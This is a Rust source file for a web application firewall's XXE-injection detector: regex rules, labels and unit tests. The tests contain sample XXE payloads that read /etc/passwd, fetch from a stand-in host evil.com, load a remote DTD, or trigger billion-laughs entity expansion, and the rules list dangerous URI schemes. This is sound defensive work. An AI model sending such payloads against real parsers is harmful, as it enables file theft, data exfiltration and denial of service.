// bext-waf 0.2.0
//
// Web Application Firewall for bext — rate limiting, IP filtering, GeoIP, rule engine
// Documentation
//! XML External Entity (XXE) injection detection.
//!
//! Detects `<!DOCTYPE` with `ENTITY` and `SYSTEM`/`PUBLIC` declarations
//! that can be used to read files, perform SSRF, or cause DoS (billion
//! laughs) via XML parsing.

use std::sync::OnceLock;

use regex::RegexSet;

/// Process-wide cache for the compiled pattern set; filled on the first call
/// to `patterns()` and reused afterwards.
static XXE_PATTERNS: OnceLock<RegexSet> = OnceLock::new();

/// Human-readable labels for the detection rules.
///
/// `check_xxe` looks a label up by the index of the matching pattern, so the
/// order of this table must mirror the order of the patterns built in
/// `patterns()`.
static XXE_DESCRIPTIONS: &[&str] = &[
    // 0: DOCTYPE with ENTITY
    "XXE: DOCTYPE with ENTITY declaration",
    // 1: SYSTEM keyword
    "XXE: SYSTEM keyword in entity",
    // 2: Entity with URI
    "XXE: ENTITY with file:// or http:// URI",
    // 3: Parameter entity
    "XXE: Parameter entity (% entity)",
    // 4: Billion laughs / entity expansion
    "XML billion laughs / entity expansion DoS",
    // 5: PUBLIC keyword
    "XXE: PUBLIC keyword in entity",
];

/// Returns the compiled set of XXE detection patterns.
///
/// The set is built on first use and cached in `XXE_PATTERNS`; every later
/// call returns the same instance. Pattern order is significant: the index of
/// a pattern is the index of its label in `XXE_DESCRIPTIONS`. All patterns
/// are case-insensitive.
///
/// # Panics
///
/// Panics on first use if a pattern fails to compile, which would be a bug in
/// the literals below rather than a runtime condition.
fn patterns() -> &'static RegexSet {
    XXE_PATTERNS.get_or_init(|| {
        RegexSet::new([
            // 0: DOCTYPE with ENTITY
            r"(?i)<!DOCTYPE\s+[^>]*\bENTITY\b",
            // 1: SYSTEM keyword
            r"(?i)<!ENTITY\s+[^>]*\bSYSTEM\b",
            // 2: Entity with URI
            r#"(?i)<!ENTITY\s+[^>]*(file://|https?://|ftp://|php://|expect://)"#,
            // 3: Parameter entity
            r"(?i)<!ENTITY\s+%\s+\w+",
            // 4: Billion laughs / entity expansion.
            // XML names may contain `.`, `:` and `-` as well as word
            // characters, so a plain `\w+` would let declarations such as
            // `<!ENTITY lol-2 "&lol-1;&lol-1;">` slip through.
            r#"(?i)<!ENTITY\s+[\w.:\-]+\s+['"](&[\w.:\-]+;){2,}"#,
            // 5: PUBLIC keyword
            r"(?i)<!ENTITY\s+[^>]*\bPUBLIC\b",
        ])
        .expect("XXE regex patterns must compile")
    })
}

/// Check an input string for XXE injection patterns.
///
/// Returns `None` when no detection pattern matches `input`. Otherwise
/// returns `Some(description)`, where the description belongs to the
/// lowest-numbered pattern that matched. If the description table has no
/// entry for that index, the generic label `"XXE injection"` is returned.
pub fn check_xxe(input: &str) -> Option<String> {
    // The match iterator yields pattern indices in ascending order, so the
    // first item is all that is needed; collecting every match into a `Vec`
    // would only add an allocation per call.
    let first_hit = patterns().matches(input).into_iter().next()?;
    let label = XXE_DESCRIPTIONS
        .get(first_hit)
        .copied()
        .unwrap_or("XXE injection");
    Some(label.to_string())
}

#[cfg(test)]
mod tests {
    use super::*;

    // Full payloads. Each of these contains `<!DOCTYPE ... <!ENTITY`, so the
    // DOCTYPE rule is enough to flag them; they check end-to-end detection only.

    #[test]
    fn detects_basic_xxe() {
        let payload =
            r#"<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>"#;
        assert!(check_xxe(payload).is_some());
    }

    #[test]
    fn detects_http_xxe() {
        let payload = r#"<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com/steal">]>"#;
        assert!(check_xxe(payload).is_some());
    }

    #[test]
    fn detects_parameter_entity() {
        let payload = r#"<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/evil.dtd">%xxe;]>"#;
        assert!(check_xxe(payload).is_some());
    }

    #[test]
    fn detects_billion_laughs() {
        let payload = r#"<!DOCTYPE lol [<!ENTITY lol1 "&lol;&lol;&lol;">]>"#;
        assert!(check_xxe(payload).is_some());
    }

    // Per-rule checks. Bare `<!ENTITY ...>` fragments keep the DOCTYPE rule
    // from firing, so each remaining rule and its label is exercised on its own.

    #[test]
    fn full_payload_reports_doctype_rule() {
        let payload = r#"<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>"#;
        assert_eq!(
            check_xxe(payload).as_deref(),
            Some("XXE: DOCTYPE with ENTITY declaration")
        );
    }

    #[test]
    fn bare_system_entity_reports_system_rule() {
        let payload = r#"<!ENTITY xxe SYSTEM "file:///etc/passwd">"#;
        assert_eq!(
            check_xxe(payload).as_deref(),
            Some("XXE: SYSTEM keyword in entity")
        );
    }

    #[test]
    fn bare_uri_entity_reports_uri_rule() {
        let payload = r#"<!ENTITY xxe "http://evil.com/steal">"#;
        assert_eq!(
            check_xxe(payload).as_deref(),
            Some("XXE: ENTITY with file:// or http:// URI")
        );
    }

    #[test]
    fn bare_parameter_entity_reports_parameter_rule() {
        let payload = r#"<!ENTITY % xxe "value">"#;
        assert_eq!(
            check_xxe(payload).as_deref(),
            Some("XXE: Parameter entity (% entity)")
        );
    }

    #[test]
    fn bare_entity_expansion_reports_billion_laughs_rule() {
        let payload = r#"<!ENTITY lol1 "&lol;&lol;&lol;">"#;
        assert_eq!(
            check_xxe(payload).as_deref(),
            Some("XML billion laughs / entity expansion DoS")
        );
    }

    #[test]
    fn bare_public_entity_reports_public_rule() {
        let payload = r#"<!ENTITY xxe PUBLIC "-//EVIL//DTD" "evil.dtd">"#;
        assert_eq!(
            check_xxe(payload).as_deref(),
            Some("XXE: PUBLIC keyword in entity")
        );
    }

    #[test]
    fn matching_is_case_insensitive() {
        let payload = r#"<!entity xxe system "file:///etc/passwd">"#;
        assert_eq!(
            check_xxe(payload).as_deref(),
            Some("XXE: SYSTEM keyword in entity")
        );
    }

    // Benign input must not be flagged.

    #[test]
    fn allows_normal_xml() {
        assert!(check_xxe("<root><item>hello</item></root>").is_none());
        assert!(check_xxe(r#"<?xml version="1.0"?><data/>"#).is_none());
    }

    #[test]
    fn allows_doctype_without_entities() {
        assert!(check_xxe("<!DOCTYPE html><html></html>").is_none());
    }

    #[test]
    fn allows_normal_text() {
        assert!(check_xxe("This is a normal comment").is_none());
        assert!(check_xxe("").is_none());
    }
}